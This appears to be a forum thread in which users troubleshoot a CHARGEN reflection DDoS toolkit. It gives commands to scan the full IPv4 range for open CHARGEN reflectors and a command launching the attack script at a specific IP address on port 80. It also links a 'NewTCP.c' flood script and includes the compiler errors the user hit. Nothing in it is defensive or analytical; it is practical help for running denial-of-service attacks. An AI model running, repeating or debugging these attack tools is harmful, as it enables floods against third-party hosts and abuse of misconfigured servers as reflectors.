Once you switched to CeontOS 6 like Evx said, put the chargenscanner.txt on the server and install gcc, ect, then run the following command to start scanning a list. ./chargenscanner 1.1.1.1 255.255.255.255 list.txt 5 0

Okay now i switched to 6.10 but with the Methods without list.txt it shows that it sends but nothing happens. When i try an .C Script without new Thread or list.txt it works great, so the Port looks Open. Any Fix?

i scanned myself with ur given Scanner, got 20k Results in the list and the Script brings:

./CHARGEN 92.210.63.202 80 list.txt 2 -1 20

But nothing happens... :(

https://pastebin.com/LgK9tKPn
tried to compile thrue:

gcc -pthread -o NewTCP NewTCP.c
or
gcc NewTCP.c -o NewTCPL -lm -lpthread
or
gcc -pthread NewTCP.c -o NewTCPLM -lm

and when i type -  cc NewTCP.c it brings:
/tmp/ccB4nSzf.o: In function `main':
NewTCP.c:(.text+0x7d0): undefined reference to `pthread_create'
collect2: ld returned 1 exit status
